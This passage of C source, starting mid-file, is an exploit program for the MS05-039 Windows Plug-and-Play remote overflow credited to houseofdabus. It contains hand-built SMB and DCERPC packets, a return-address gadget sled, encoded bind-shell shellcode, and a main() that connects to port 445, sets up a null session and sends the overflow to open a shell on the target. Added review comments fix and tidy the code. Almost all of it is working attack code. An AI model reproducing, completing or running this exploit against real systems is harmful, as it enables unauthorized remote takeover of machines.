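unsigned char SMB_SessionSetupAndX2[] =
"\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00"
"\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46"
"\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40"
"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40"
"\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48"
"\x00\x4F\x00\x44\x00\x00\xED\x41\x2C\x27\x86\x26\xD2\x59\xA0\xB3"
"\x5E\xAA\x00\x88\x6F\xC5\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00"
"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00"
"\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00"
"\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00"
"\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00";

/* TreeConnectAndX (0x75) header only. main() appends the UTF-16LE
 * \\host\IPC$ path and SMB_TreeConnectAndX_, then patches the NetBIOS
 * length (byte 3, 0x5A here) and the ByteCount (3 bytes from the end). */
unsigned char SMB_TreeConnectAndX[] =
"\x00\x00\x00\x5A\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x08\x30\x00\x04\xFF\x00\x5A\x00\x08\x00\x01\x00\x2F\x00\x00";

/* UTF-16 NUL terminator for the path, then the "?????" service string. */
unsigned char SMB_TreeConnectAndX_[] =
"\x00\x00\x3F\x3F\x3F\x3F\x3F\x00";

/* NTCreateAndX (0xA2) opening the "\browser" named pipe on IPC$. */
unsigned char SMB_PipeRequest_browser[] =
"\x00\x00\x00\x66\xFF\x53\x4D\x42\xA2\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
"\x00\x08\x40\x00\x18\xFF\x00\xDE\xDE\x00\x10\x00\x16\x00\x00\x00"
"\x00\x00\x00\x00\x9F\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00"
"\x02\x00\x00\x00\x03\x13\x00\x00\x5C\x00\x62\x00\x72\x00\x6F\x00"
"\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00";

/* SMB Transaction (0x25) on \PIPE\ carrying a DCERPC bind (ptype 0x0B)
 * to the PNP interface below, with the 32-bit NDR transfer syntax
 * 8a885d04-1ceb-11c9-9fe8-08002b104860. */
unsigned char SMB_PNPEndpoint[] =
/* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */
"\x00\x00\x00\x9C\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
"\x00\x08\x50\x00\x10\x00\x00\x48\x00\x00\x00\x00\x10\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02"
"\x00\x26\x00\x00\x40\x59\x00\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
"\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x0B\x03\x10\x00\x00\x00"
"\x48\x00\x00\x00\x01\x00\x00\x00\xB8\x10\xB8\x10\x00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x01\x00\x40\x4E\x9F\x8D\x3D\xA0\xCE\x11"
"\x8F\x69\x08\x00\x3E\x30\x05\x1B\x01\x00\x00\x00\x04\x5D\x88\x8A"
"\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00";

/* SMB Transaction (0x25) carrying the DCERPC request (ptype 0x00,
 * opnum 0x36) whose string argument is "ROOT\SYSTEM\0000". The tail
 * after the fixed fields is a sled of "jmp +8 / pop pop ret" pairs;
 * main() follows it with bind_shellcode, pads the rest of the 2196-byte
 * transaction with 0x90 and places RPC_call_end near the end. */
unsigned char RPC_call[] =
"\x00\x00\x08\x90\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
"\x00\x08\x60\x00\x10\x00\x00\x3C\x08\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x3C\x08\x54\x00\x02"
"\x00\x26\x00\x00\x40\x4D\x08\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
"\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x00\x03\x10\x00\x00\x00"
"\x3C\x08\x00\x00\x01\x00\x00\x00\x24\x08\x00\x00\x00\x00\x36\x00"
"\x11\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x52\x00\x4F\x00"
"\x4F\x00\x54\x00\x5C\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00"
"\x4D\x00\x5C\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00\x00\x00"
"\xFF\xFF\x00\x00\xE0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xC0\x07\x00\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
"\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
/* jmp over - entry point */
"\xEB\x08\x90\x90"
/* pop reg; pop reg; retn; - umpnpmgr.dll (build-specific, see "Tested on") */
"\x67\x15\x7a\x76" /* 0x767a1567 */
/* alternative gadget, jmp ebx - umpnpmgr.dll:
"\x6f\x36\x7a\x76" */
"\xEB\x08\x90\x90\x67\x15\x7a\x76"
"\x90\x90\x90\x90\x90\x90\x90\xEB\x08\x90\x90\x48\x4F\x44\x88\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

/* Trailing request fields, written by main() at a fixed offset from the
 * end of the 2196-byte transaction. */
unsigned char RPC_call_end[] =
"\xE0\x07\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00";

/* Encoded bind-shell payload. The listen port is patched in at offset
 * 186 by SET_PORTBIND_PORT; main() XORs it with 0x0437 first, so that
 * constant and this offset must stay in sync with the payload bytes. */
unsigned char bind_shellcode[] =
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19"
"\xf5\x04\x37\x83\xeb\xfc\xe2\xf4\xe5\x9f\xef\x7a\xf1\x0c\xfb\xc8"
"\xe6\x95\x8f\x5b\x3d\xd1\x8f\x72\x25\x7e\x78\x32\x61\xf4\xeb\xbc"
"\x56\xed\x8f\x68\x39\xf4\xef\x7e\x92\xc1\x8f\x36\xf7\xc4\xc4\xae"
"\xb5\x71\xc4\x43\x1e\x34\xce\x3a\x18\x37\xef\xc3\x22\xa1\x20\x1f"
"\x6c\x10\x8f\x68\x3d\xf4\xef\x51\x92\xf9\x4f\xbc\x46\xe9\x05\xdc"
"\x1a\xd9\x8f\xbe\x75\xd1\x18\x56\xda\xc4\xdf\x53\x92\xb6\x34\xbc"
"\x59\xf9\x8f\x47\x05\x58\x8f\x77\x11\xab\x6c\xb9\x57\xfb\xe8\x67"
"\xe6\x23\x62\x64\x7f\x9d\x37\x05\x71\x82\x77\x05\x46\xa1\xfb\xe7"
"\x71\x3e\xe9\xcb\x22\xa5\xfb\xe1\x46\x7c\xe1\x51\x98\x18\x0c\x35"
"\x4c\x9f\x06\xc8\xc9\x9d\xdd\x3e\xec\x58\x53\xc8\xcf\xa6\x57\x64"
"\x4a\xa6\x47\x64\x5a\xa6\xfb\xe7\x7f\x9d\x1a\x55\x7f\xa6\x8d\xd6"
"\x8c\x9d\xa0\x2d\x69\x32\x53\xc8\xcf\x9f\x14\x66\x4c\x0a\xd4\x5f"
"\xbd\x58\x2a\xde\x4e\x0a\xd2\x64\x4c\x0a\xd4\x5f\xfc\xbc\x82\x7e"
"\x4e\x0a\xd2\x67\x4d\xa1\x51\xc8\xc9\x66\x6c\xd0\x60\x33\x7d\x60"
"\xe6\x23\x51\xc8\xc9\x93\x6e\x53\x7f\x9d\x67\x5a\x90\x10\x6e\x67"
"\x40\xdc\xc8\xbe\xfe\x9f\x40\xbe\xfb\xc4\xc4\xc4\xb3\x0b\x46\x1a"
"\xe7\xb7\x28\xa4\x94\x8f\x3c\x9c\xb2\x5e\x6c\x45\xe7\x46\x12\xc8"
"\x6c\xb1\xfb\xe1\x42\xa2\x56\x66\x48\xa4\x6e\x36\x48\xa4\x51\x66"
"\xe6\x25\x6c\x9a\xc0\xf0\xca\x64\xe6\x23\x6e\xc8\xe6\xc2\xfb\xe7"
"\x92\xa2\xf8\xb4\xdd\x91\xfb\xe1\x4b\x0a\xd4\x5f\xf6\x3b\xe4\x57"
"\x4a\x0a\xd2\xc8\xc9\xf5\x04\x37";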
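/*
 * Store a 16-bit port into bind_shellcode at offset 186, the slot the
 * encoded payload reserves for its listen port. main() passes
 * htons(port ^ 0x0437); the XOR presumably cancels the payload's own
 * decoding so the plain port ends up in memory -- keep that constant and
 * this offset in step with the payload bytes.
 *
 * Written through memcpy rather than a cast so the (possibly unaligned)
 * store is well defined. The macro keeps the original call spelling.
 *
 * NOTE(review): the line-continuation backslash of the original macro
 * had been lost in the listing, leaving an empty macro and a stray
 * statement; restored here as a function plus wrapper macro.
 */
static void
set_portbind_port(unsigned char *buf, unsigned short port)
{
    memcpy(buf + 186, &port, sizeof port);
}
#define SET_PORTBIND_PORT(buf, port) set_portbind_port((buf), (port))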
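/*
 * Widen an ASCII string to UTF-16LE: every byte of name becomes that byte
 * followed by 0x00. out must have room for 2 * strlen(name) bytes. No
 * terminator is written; callers append their own (SMB_TreeConnectAndX_
 * starts with the "\x00\x00" that ends the path).
 *
 * The copy runs from the end of the string toward the start, so out may
 * even overlap name's own storage -- each source byte is read before the
 * widened pair that covers it is written.
 *
 * An empty name writes nothing (the original stepped out to out - 1 in
 * that case, which is undefined even though the loop never ran).
 */
void
convert_name(char *out, char *name)
{
    size_t len = strlen(name);
    char *dst;

    if (len == 0)
        return;

    dst = out + len * 2 - 1;
    while (len--) {
        *dst-- = '\0';
        *dst-- = name[len];
    }
}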
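/*
 * Send one canned request and read one reply.
 *
 * Returns the reply length on success. Returns -1 (after printing the
 * same diagnostics the original flow printed) when the send fails, when
 * the reply is too short to hold an SMB header, or -- only if
 * check_status is non-zero -- when the low byte of the NT status field
 * (reply offset 9) is not zero. The first session-setup reply is not
 * status-checked, presumably because the NTLMSSP challenge comes back
 * with a non-success status; its caller passes check_status = 0.
 */
static int
smb_exchange(int sockfd, const unsigned char *req, size_t reqlen,
             char *resp, size_t resplen, int check_status)
{
    int n;

    if (send(sockfd, (const char *)req, (int)reqlen, 0) < 0) {
        printf("\n[-] send failed\n");
        return -1;
    }
    n = recv(sockfd, resp, (int)resplen, 0);
    if (n <= 10 || (check_status && resp[9] != 0)) {
        printf("\n[-] failed\n");
        return -1;
    }
    return n;
}

/*
 * Entry point: <host> <bind port>.
 *
 * Runs the whole exchange against host:445 -- SMB negotiate, two
 * NTLMSSP session-setup rounds (the "null session"), a tree connect to
 * \\host\IPC$, an NTCreateAndX on the \browser pipe, a DCERPC bind to the
 * PNP interface in SMB_PNPEndpoint, and finally the 2196-byte request
 * built from RPC_call, bind_shellcode and RPC_call_end. The bind port is
 * patched into the payload via SET_PORTBIND_PORT.
 *
 * Returns 0 when every request was acknowledged (which only shows the
 * packets were accepted, not that a listener is up) and 1 on any failure;
 * the original exited 0 on failure too, which hid errors from scripts.
 *
 * NOTE(review): this copy of the listing had several printf lines cut
 * off mid-string and every escape stripped; the text is restored from the
 * complete copy of the same program earlier on the page.
 */
int
main (int argc, char **argv)
{
    struct sockaddr_in addr;
    struct hostent *he;
    int sockfd;
    long port;
    char *end;
    size_t hostlen;
    size_t pathlen;
    size_t total;
    unsigned short smblen;
    unsigned short bindport;
    char tmp[1024];
    unsigned char packet[4096];
    unsigned char *ptr;
    char recvbuf[4096];
#ifdef _WIN32
    WSADATA wsa;
    if (WSAStartup(MAKEWORD(2,0), &wsa) != 0) {
        printf("[-] WSAStartup failed\n");
        return 1;
    }
#endif

    printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
    printf("\t Universal Exploit + no crash shellcode\n\n\n");
    printf("\t Copyright (c) 2005 .: houseofdabus :.\n\n\n");

    if (argc < 3) {
        printf("%s <host> <bind port>\n", argv[0]);
        return 1;
    }

    /* The port is stored in the payload as 16 bits; reject what atoi()
     * would silently have truncated or mis-parsed. */
    port = strtol(argv[2], &end, 10);
    if (end == argv[2] || *end != '\0' || port < 1 || port > 65535) {
        printf("[-] invalid bind port %s\n", argv[2]);
        return 1;
    }

    /* "\\\\" + host + "\\IPC$ " must fit tmp (8 literal characters). */
    hostlen = strlen(argv[1]);
    if (hostlen + 8 >= sizeof tmp) {
        printf("[-] host name too long\n");
        return 1;
    }

    if ((he = gethostbyname(argv[1])) == NULL || he->h_addrtype != AF_INET) {
        printf("[-] Unable to resolve %s\n", argv[1]);
        return 1;
    }

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        printf("[-] socket failed\n");
        return 1;
    }

    memset(&addr, 0, sizeof addr);
    addr.sin_family = AF_INET;
    addr.sin_port = htons(445);
    memcpy(&addr.sin_addr, he->h_addr, sizeof addr.sin_addr);

    printf("\n connecting to %s:445...", argv[1]);
    if (connect(sockfd, (struct sockaddr *)&addr, sizeof addr) < 0) {
        printf("\n[-] connect failed\n");
        return 1;
    }
    printf("ok\n");

    /* Negotiate, then the two NTLMSSP session-setup rounds. Per the header
     * notes only Windows 2000 lets an anonymous client get this far. */
    printf(" null session...");
    if (smb_exchange(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate) - 1,
                     recvbuf, sizeof recvbuf, 1) < 0)
        return 1;
    if (smb_exchange(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX) - 1,
                     recvbuf, sizeof recvbuf, 0) < 0)
        return 1;
    if (smb_exchange(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2) - 1,
                     recvbuf, sizeof recvbuf, 1) < 0)
        return 1;

    /* TreeConnectAndX to \\host\IPC$: the ASCII path is widened to
     * UTF-16LE in place, then the terminator and "?????" service follow.
     * The trailing space in the path is kept from the original. */
    sprintf(tmp, "\\\\%s\\IPC$ ", argv[1]);
    pathlen = strlen(tmp) * 2;
    total = sizeof(SMB_TreeConnectAndX) - 1 + pathlen + sizeof(SMB_TreeConnectAndX_) - 1;
    /* Both length fields below are written as a single byte (the NetBIOS
     * length's high bytes in the template are zero), so the request must
     * stay under 256 bytes after its 4-byte session header. */
    if (total - 4 > 0xFF) {
        printf("\n[-] host name too long\n");
        return 1;
    }
    ptr = packet;
    memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX) - 1);
    ptr += sizeof(SMB_TreeConnectAndX) - 1;
    convert_name((char *)ptr, tmp);
    ptr += pathlen;
    /* ByteCount = path bytes + the 9 fixed bytes around it (as in the
     * original). Assign the low byte directly: the original memcpy of one
     * byte from an unsigned short only worked on little-endian hosts. */
    smblen = (unsigned short)(pathlen + 9);
    packet[sizeof(SMB_TreeConnectAndX) - 1 - 3] = (unsigned char)smblen;
    memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_) - 1);
    ptr += sizeof(SMB_TreeConnectAndX_) - 1;
    /* NetBIOS session length excludes its own 4-byte header. */
    smblen = (unsigned short)(ptr - packet - 4);
    packet[3] = (unsigned char)smblen;
    if (smb_exchange(sockfd, packet, (size_t)(ptr - packet),
                     recvbuf, sizeof recvbuf, 1) < 0)
        return 1;
    printf("ok\n");

    /* Open \browser on IPC$, then DCERPC-bind the PNP interface over it. */
    printf(" bind pipe...");
    if (smb_exchange(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser) - 1,
                     recvbuf, sizeof recvbuf, 1) < 0)
        return 1;
    if (smb_exchange(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint) - 1,
                     recvbuf, sizeof recvbuf, 1) < 0)
        return 1;
    printf("ok\n");

    printf(" sending crafted packet...");
    /* Everything not explicitly written below stays 0x90 filler. */
    memset(packet, '\x90', sizeof packet);
    ptr = packet;
    memcpy(ptr, RPC_call, sizeof(RPC_call) - 1);
    ptr += sizeof(RPC_call) - 1;
    /* The port goes in pre-XORed with 0x0437 and in network order;
     * presumably this cancels the payload's own decoder so the plain port
     * lands in memory. Keep the constant in step with bind_shellcode. */
    bindport = (unsigned short)port;
    bindport ^= 0x0437;
    SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
    memcpy(ptr, bind_shellcode, sizeof(bind_shellcode) - 1);
    /* Trailing request fields sit at a fixed distance from the end of the
     * 2196-byte transaction (offset 2185 with a 13-byte RPC_call_end). */
    memcpy(packet + 2196 - sizeof(RPC_call_end) - 1 + 2,
           RPC_call_end,
           sizeof(RPC_call_end) - 1);
    if (send(sockfd, (const char *)packet, 2196, 0) < 0) {
        printf("\n[-] send failed\n");
        return 1;
    }
    printf("ok\n");
    printf(" check your shell on %s:%i\n", argv[1], (int)port);

    /* Block until the server answers or drops the connection, as the
     * original did; a successfully hit target may never reply. */
    recv(sockfd, recvbuf, (int)sizeof recvbuf, 0);
    return 0;
}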